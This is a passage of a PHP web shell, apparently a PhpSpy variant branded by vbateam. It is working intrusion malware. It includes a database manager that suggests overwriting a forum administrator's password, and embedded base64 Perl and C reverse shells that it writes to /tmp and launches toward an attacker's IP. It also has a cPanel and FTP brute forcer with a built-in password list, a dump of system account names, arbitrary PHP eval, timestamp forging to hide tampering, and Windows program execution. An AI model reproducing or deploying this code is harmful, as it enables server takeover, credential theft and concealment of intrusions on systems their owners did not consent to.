773. !$dbhost && $dbhost = 'localhost';
774. !$dbuser && $dbuser = 'root';
775. !$dbport && $dbport = '3306';
776. $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
777. if(isset($dbhost)){
778. $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
779. }
780. if(isset($dbuser)) {
781. $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
782. }
783. if(isset($dbpass)) {
784. $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
785. }
786. if(isset($dbport)) {
787. $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
788. }
789. if(isset($dbname)) {
790. $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
791. }
792. if(isset($charset)) {
793. $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
794. }
795.  
796. if ($doing == 'backupmysql' && $saveasfile) {
797. if (!$table) {
798. m('Please choose the table');
799. } else {
800. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
801. $table = array_flip($table);
802. $fp = @fopen($path,'w');
803. if ($fp) {
804. $result = q('SHOW tables');
805. if (!$result) p('<h2>'.mysql_error().'</h2>');
806. $mysqldata = '';
807. while ($currow = mysql_fetch_array($result)) {
808. if (isset($table[$currow[0]])) {
809. sqldumptable($currow[0], $fp);
810. }
811. }
812. fclose($fp);
813. $fileurl = str_replace(SA_ROOT,'',$path);
814. m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
815. mysql_close();
816. } else {
817. m('Backup failed');
818. }
819. }
820. }
821. if ($insert && $insertsql) {
822. $keystr = $valstr = $tmp = '';
823. foreach($insertsql as $key => $val) {
824. if ($val) {
825. $keystr .= $tmp.$key;
826. $valstr .= $tmp."'".addslashes($val)."'";
827. $tmp = ',';
828. }
829. }
830. if ($keystr && $valstr) {
831. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
832. m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
833. }
834. }
835. if ($update && $insertsql && $base64) {
836. $valstr = $tmp = '';
837. foreach($insertsql as $key => $val) {
838. $valstr .= $tmp.$key."='".addslashes($val)."'";
839. $tmp = ',';
840. }
841. if ($valstr) {
842. $where = base64_decode($base64);
843. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
844. m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
845. }
846. }
847. if ($doing == 'del' && $base64) {
848. $where = base64_decode($base64);
849. $delete_sql = "DELETE FROM $tablename WHERE $where";
850. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
851. m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
852. }
853.  
854. if ($tablename && $doing == 'drop') {
855. dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
856. if (q("DROP TABLE $tablename")) {
857. m('Drop table of success');
858. $tablename = '';
859. } else {
860. m(mysql_error());
861. }
862. }
863.  
864. $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1');
865.  
866. formhead(array('title'=>'MYSQL Manager'));
867. makehide('action','sqladmin');
868. p('<p>');
869. p('DBHost:');
870. makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
871. p(':');
872. makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
873. p('DBUser:');
874. makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
875. p('DBPass:');
876. makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
877. p('DBCharset:');
878. makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset));
879. makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
880. p('</p>');
881. formfoot();
882. ?>
883. <script type="text/javascript">
884. function editrecord(action, base64, tablename){
885. if (action == 'del') {
886. if (!confirm('Is or isn\'t deletion record?')) return;
887. }
888. $('recordlist').doing.value=action;
889. $('recordlist').base64.value=base64;
890. $('recordlist').tablename.value=tablename;
891. $('recordlist').submit();
892. }
893. function moddbname(dbname) {
894. if(!dbname) return;
895. $('setdbname').dbname.value=dbname;
896. $('setdbname').submit();
897. }
898. function settable(tablename,doing,page) {
899. if(!tablename) return;
900. if (doing) {
901. $('settable').doing.value=doing;
902. }
903. if (page) {
904. $('settable').page.value=page;
905. }
906. $('settable').tablename.value=tablename;
907. $('settable').submit();
908. }
909. </script>
910. <?php
911. // SQL
912. formhead(array('name'=>'recordlist'));
913. makehide('doing');
914. makehide('action','sqladmin');
915. makehide('base64');
916. makehide('tablename');
917. p($dbform);
918. formfoot();
919.  
920. // Data
921. formhead(array('name'=>'setdbname'));
922. makehide('action','sqladmin');
923. p($dbform);
924. if (!$dbname) {
925. makehide('dbname');
926. }
927. formfoot();
928.  
929.  
930. formhead(array('name'=>'settable'));
931. makehide('action','sqladmin');
932. p($dbform);
933. makehide('tablename');
934. makehide('page',$page);
935. makehide('doing');
936. formfoot();
937.  
938. $cachetables = array();
939. $pagenum = 30;
940. $page = intval($page);
941. if($page) {
942. $start_limit = ($page - 1) * $pagenum;
943. } else {
944. $start_limit = 0;
945. $page = 1;
946. }
947. if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
948. dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
949. // get mysql server
950. $mysqlver = mysql_get_server_info();
951. p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
952. $highver = $mysqlver > '4.1' ? 1 : 0;
953.  
954. // Show database
955. $query = q("SHOW DATABASES");
956. $dbs = array();
957. $dbs[] = '-- Select a database --';
958. while($db = mysql_fetch_array($query)) {
959. $dbs[$db['Database']] = $db['Database'];
960. }
961. makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
962. $tabledb = array();
963. if ($dbname) {
964. p('<p>');
965. p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
966. if ($tablename) {
967. p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
968. }
969. p('</p>');
970. mysql_select_db($dbname);
971.  
972. $getnumsql = '';
973. $runquery = 0;
974. if ($sql_query) {
975. $runquery = 1;
976. }
977. $allowedit = 0;
978. if ($tablename && !$sql_query) {
979. $sql_query = "SELECT * FROM $tablename";
980. $getnumsql = $sql_query;
981. $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
982. $allowedit = 1;
983. }
984. p('<form action="'.$self.'" method="POST">');
985. p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>'.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
986. </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
987. makehide('tablename', $tablename);
988. makehide('action','sqladmin');
989. p($dbform);
990. p('</form>');
991. if ($tablename || ($runquery && $sql_query)) {
992. if ($doing == 'structure') {
993. $result = q("SHOW COLUMNS FROM $tablename");
994. $rowdb = array();
995. while($row = mysql_fetch_array($result)) {
996. $rowdb[] = $row;
997. }
998. p('<table border="0" cellpadding="3" cellspacing="0">');
999. p('<tr class="head">');
1000. p('<td>Field</td>');
1001. p('<td>Type</td>');
1002. p('<td>Null</td>');
1003. p('<td>Key</td>');
1004. p('<td>Default</td>');
1005. p('<td>Extra</td>');
1006. p('</tr>');
1007. foreach ($rowdb as $row) {
1008. $thisbg = bg();
1009. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1010. p('<td>'.$row['Field'].'</td>');
1011. p('<td>'.$row['Type'].'</td>');
1012. p('<td>'.$row['Null'].'&nbsp;</td>');
1013. p('<td>'.$row['Key'].'&nbsp;</td>');
1014. p('<td>'.$row['Default'].'&nbsp;</td>');
1015. p('<td>'.$row['Extra'].'&nbsp;</td>');
1016. p('</tr>');
1017. }
1018. tbfoot();
1019. } elseif ($doing == 'insert' || $doing == 'edit') {
1020. $result = q('SHOW COLUMNS FROM '.$tablename);
1021. while ($row = mysql_fetch_array($result)) {
1022. $rowdb[] = $row;
1023. }
1024. $rs = array();
1025. if ($doing == 'insert') {
1026. p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
1027. } else {
1028. p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
1029. $where = base64_decode($base64);
1030. $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1031. $rs = mysql_fetch_array($result);
1032. }
1033. p('<form method="post" action="'.$self.'">');
1034. p($dbform);
1035. makehide('action','sqladmin');
1036. makehide('tablename',$tablename);
1037. p('<table border="0" cellpadding="3" cellspacing="0">');
1038. foreach ($rowdb as $row) {
1039. if ($rs[$row['Field']]) {
1040. $value = htmlspecialchars($rs[$row['Field']]);
1041. } else {
1042. $value = '';
1043. }
1044. $thisbg = bg();
1045. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1046. p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1047. }
1048. if ($doing == 'insert') {
1049. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1050. } else {
1051. p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1052. makehide('base64', $base64);
1053. }
1054. p('</table></form>');
1055. } else {
1056. $querys = @explode(';',$sql_query);
1057. foreach($querys as $num=>$query) {
1058. if ($query) {
1059. p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1060. switch(qy($query))
1061. {
1062. case 0:
1063. p('<h2>Error : '.mysql_error().'</h2>');
1064. break;
1065. case 1:
1066. if (strtolower(substr($query,0,13)) == 'select * from') {
1067. $allowedit = 1;
1068. }
1069. if ($getnumsql) {
1070. $tatol = mysql_num_rows(q($getnumsql));
1071. $multipage = multi($tatol, $pagenum, $page, $tablename);
1072. }
1073. if (!$tablename) {
1074. $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1075. $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1076. preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1077. $tablename = $matches[1][0];
1078. }
1079. $result = q($query);
1080. p($multipage);
1081. p('<table border="0" cellpadding="3" cellspacing="0">');
1082. p('<tr class="head">');
1083. if ($allowedit) p('<td>Action</td>');
1084. $fieldnum = @mysql_num_fields($result);
1085. for($i=0;$i<$fieldnum;$i++){
1086. $name = @mysql_field_name($result, $i);
1087. $type = @mysql_field_type($result, $i);
1088. $len = @mysql_field_len($result, $i);
1089. p("<td nowrap>$name<br><span>$type($len)</span></td>");
1090. }
1091. p('</tr>');
1092. while($mn = @mysql_fetch_assoc($result)){
1093. $thisbg = bg();
1094. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1095. $where = $tmp = $b1 = '';
1096. foreach($mn as $key=>$inside){
1097. if ($inside) {
1098. $where .= $tmp.$key."='".addslashes($inside)."'";
1099. $tmp = ' AND ';
1100. }
1101. $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
1102. }
1103. $where = base64_encode($where);
1104. if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1105. p($b1);
1106. p('</tr>');
1107. unset($b1);
1108. }
1109. tbfoot();
1110. p($multipage);
1111. break;
1112. case 2:
1113. $ar = mysql_affected_rows();
1114. p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1115. break;
1116. }
1117. }
1118. }
1119. }
1120. } else {
1121. $query = q("SHOW TABLE STATUS");
1122. $table_num = $table_rows = $data_size = 0;
1123. $tabledb = array();
1124. while($table = mysql_fetch_array($query)) {
1125. $data_size = $data_size + $table['Data_length'];
1126. $table_rows = $table_rows + $table['Rows'];
1127. $table['Data_length'] = sizecount($table['Data_length']);
1128. $table_num++;
1129. $tabledb[] = $table;
1130. }
1131. $data_size = sizecount($data_size);
1132. unset($table);
1133. p('<table border="0" cellpadding="0" cellspacing="0">');
1134. p('<form action="'.$self.'" method="POST">');
1135. makehide('action','sqladmin');
1136. p($dbform);
1137. p('<tr class="head">');
1138. p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1139. p('<td>Name</td>');
1140. p('<td>Rows</td>');
1141. p('<td>Data_length</td>');
1142. p('<td>Create_time</td>');
1143. p('<td>Update_time</td>');
1144. if ($highver) {
1145. p('<td>Engine</td>');
1146. p('<td>Collation</td>');
1147. }
1148. p('</tr>');
1149. foreach ($tabledb as $key => $table) {
1150. $thisbg = bg();
1151. p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1152. p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1153. p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
1154. p('<td>'.$table['Rows'].'</td>');
1155. p('<td>'.$table['Data_length'].'</td>');
1156. p('<td>'.$table['Create_time'].'</td>');
1157. p('<td>'.$table['Update_time'].'</td>');
1158. if ($highver) {
1159. p('<td>'.$table['Engine'].'</td>');
1160. p('<td>'.$table['Collation'].'</td>');
1161. }
1162. p('</tr>');
1163. }
1164. p('<tr class=fout>');
1165. p('<td>&nbsp;</td>');
1166. p('<td>Total tables: '.$table_num.'</td>');
1167. p('<td>'.$table_rows.'</td>');
1168. p('<td>'.$data_size.'</td>');
1169. p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
1170. p('</tr>');
1171.  
1172. p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1173. makehide('doing','backupmysql');
1174. formfoot();
1175. p("</table>");
1176. fr($query);
1177. }
1178. }
1179. }
1180. tbfoot();
1181. @mysql_close();
1182. }//end sql backup
1183.  
1184.  
1185. elseif ($action == 'backconnect') {
1186. !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1187. !$yourport && $yourport = '12345';
1188. $usedb = array('perl'=>'perl','c'=>'c');
1189.  
1190. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1191. "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1192. "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1193. "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1194. "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1195. "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1196. "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1197. $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1198. "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1199. "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1200. "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1201. "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1202. "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1203. "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1204. "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1205.  
1206. if ($start && $yourip && $yourport && $use){
1207. if ($use == 'perl') {
1208. cf('/tmp/angel_bc',$back_connect);
1209. $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1210. } else {
1211. cf('/tmp/angel_bc.c',$back_connect_c);
1212. $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1213. @unlink('/tmp/angel_bc.c');
1214. $res = execute("/tmp/angel_bc $yourip $yourport &");
1215. }
1216. m("Now script try connect to $yourip port $yourport ...");
1217. }
1218.  
1219. formhead(array('title'=>'Back Connect'));
1220. makehide('action','backconnect');
1221. p('<p>');
1222. p('Your IP:');
1223. makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1224. p('Your Port:');
1225. makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1226. p('Use:');
1227. makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1228. makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1229. p('</p>');
1230. formfoot();
1231. }//end backconnect window via NC
1232.  
1233. // Brute
1234. elseif ($action == 'brute') {
1235. formhead(array('title'=>'Brute Forcer'));
1236. makehide('action','brute');
1237. makehide('dir',$brute);
1238. @ini_set('memory_limit', 1000000000000);
1239. $connect_timeout=5;
1240. @set_time_limit(0);
1241. $submit = $_REQUEST['submit'];
1242. $users = $_REQUEST['users'];
1243. $pass = $_REQUEST['passwords'];
1244. $target = $_REQUEST['target'];
1245. $option = $_REQUEST['option'];
1246.  
1247.  
1248. $passlist = "0123456
1249. 01234567
1250. 012345678
1251. 0123456789
1252. 01234567890
1253. 123456
1254. 1234567
1255. 12345678
1256. 123456789
1257. 1234567890
1258. 111111
1259. 000000
1260. 222222
1261. 333333
1262. 444444
1263. 555555
1264. 666666
1265. 777777
1266. 888888
1267. 999999
1268. 123123
1269. 456456
1270. 789789
1271. 123321
1272. 456654
1273. 654321
1274. 7654321
1275. 87654321
1276. 987654321
1277. 0987654321
1278. admin
1279. administrator
1280. admincp
1281. cpanel
1282. adminx
1283. admins
1284. password
1285. passwords
1286. passw0rd
1287. p@ssw0rd
1288. p@ssword
1289. khongco
1290. 25251325
1291. passw0rds";
1292. if($target == ''){
1293. $target = 'localhost';
1294. }
1295. print " <div align='center'>
1296. <form method='post' style='border: 1px solid #000000'><br><br>
1297. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1298. <b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1299. <div align='center'><br>
1300. <TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1301. <tr>
1302. <td align='center'>
1303. <b>Username</b></td>
1304. <td>
1305. <p align='center'>
1306. <b>Password</b></td>
1307. </tr>
1308. </table>
1309. <p align='center'>
1310. <textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1311. $i = 0;
1312. while ($i < 60000) {
1313.  
1314. $line = posix_getpwuid($i);
1315. if (!empty($line)) {
1316.  
1317. while (list ($key, $vba_etcpwd) = each($line)){
1318. echo "".$vba_etcpwd."\n";
1319. break;
1320. }
1321.  
1322. }
1323.  
1324. $i++;
1325. }
1326. echo "
1327. </textarea>
1328. <textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1329. <br>
1330. <b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1331. <input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1332. </td></tr></table></td></tr></form><p align= 'left'>";
1333. ?>
1334. <?php
1335. function ftp_check($host,$user,$pass,$timeout){
1336. $ch = curl_init();
1337. curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1338. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1339. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1340. curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1341. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1342. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1343. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1344. $data = curl_exec($ch);
1345. if ( curl_errno($ch) == 28 ) {
1346.  
1347. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1348. exit;}
1349.  
1350. elseif ( curl_errno($ch) == 0 ){
1351.  
1352. p("<b>[ attack@vbateam.net ]# </b>
1353. <b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1354. }
1355. curl_close($ch);}
1356.  
1357. function cpanel_check($host,$user,$pass,$timeout){
1358. $ch = curl_init();
1359. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1360. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1361. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1362. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1363. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1364. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1365. $data = curl_exec($ch);
1366. if ( curl_errno($ch) == 28 ) {
1367. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1368. exit;}
1369. elseif ( curl_errno($ch) == 0 ){
1370.  
1371. p("<b>[ attack@vbateam.net ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1372.  
1373. if(isset($submit) && !empty($submit)){
1374.  
1375. $userlist = explode ("\n" , $users );
1376. $passlist = explode ("\n" , $pass );
1377. p('<b>[ attack@vbateam.net ]# Attacking ...</font></b><br>');
1378. foreach ($userlist as $user) {
1379. $_user = trim($user);
1380. foreach ($passlist as $password ) {
1381. $_pass = trim($password);
1382. if($option == "ftp"){
1383. ftp_check($target,$_user,$_pass,$connect_timeout);
1384. }
1385. if ($option == "cpanel")
1386. {
1387. cpanel_check($target,$_user,$_pass,$connect_timeout);
1388. }
1389. }
1390. }
1391. }
1392.  
1393. formfoot();
1394. }
1395.  
1396.  
1397.  
1398.  
1399.  
1400.  
1401. elseif ($action == 'etcpwd') {
1402. formhead(array('title'=>'Get /etc/passwd'));
1403. makehide('action','etcpwd');
1404. makehide('dir',$nowpath);
1405. $i = 0;
1406. echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1407. while ($i < 60000) {
1408.  
1409. $line = posix_getpwuid($i);
1410. if (!empty($line)) {
1411.  
1412. while (list ($key, $vba_etcpwd) = each($line)){
1413. echo "".$vba_etcpwd."\n";
1414. break;
1415. }
1416.  
1417. }
1418.  
1419. $i++;
1420. }
1421. echo "</textarea></p>";
1422. formfoot();
1423. }
1424.  
1425. elseif ($action == 'eval') {
1426. $phpcode = trim($phpcode);
1427. if($phpcode){
1428. if (!preg_match('#<\?#si', $phpcode)) {
1429. $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1430. }
1431. eval("?".">$phpcode<?");
1432. }
1433. formhead(array('title'=>'Eval PHP Code'));
1434. makehide('action','eval');
1435. maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1436. p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1437. formfooter();
1438. }//end eval
1439.  
1440. elseif ($action == 'editfile') {
1441. if(file_exists($opfile)) {
1442. $fp=@fopen($opfile,'r');
1443. $contents=@fread($fp, filesize($opfile));
1444. @fclose($fp);
1445. $contents=htmlspecialchars($contents);
1446. }
1447. formhead(array('title'=>'Create / Edit File'));
1448. makehide('action','file');
1449. makehide('dir',$nowpath);
1450. makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1451. maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1452. formfooter();
1453. }//end editfile
1454.  
1455. elseif ($action == 'newtime') {
1456. $opfilemtime = @filemtime($opfile);
1457. //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1458. $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1459. formhead(array('title'=>'Clone file was last modified time'));
1460. makehide('action','file');
1461. makehide('dir',$nowpath);
1462. makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1463. makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1464. formfooter();
1465. formhead(array('title'=>'Set last modified'));
1466. makehide('action','file');
1467. makehide('dir',$nowpath);
1468. makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1469. p('<p>Instead &raquo;');
1470. p('year:');
1471. makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1472. p('month:');
1473. makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1474. p('day:');
1475. makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1476. p('hour:');
1477. makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1478. p('minute:');
1479. makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1480. p('second:');
1481. makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1482. p('</p>');
1483. formfooter();
1484. }//end newtime
1485.  
1486. elseif ($action == 'shell') {
1487. if (IS_WIN && IS_COM) {
1488. if($program && $parameter) {
1489. $shell= new COM('Shell.Application');
1490. $a = $shell->ShellExecute($program,$parameter);
1491. m('Program run has '.(!$a ? 'success' : 'fail'));
1492. }
1493. !$program && $program = 'c:\windows\system32\cmd.exe';
1494. !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1495. formhead(array('title'=>'Execute Program'));
1496. makehide('action','shell');
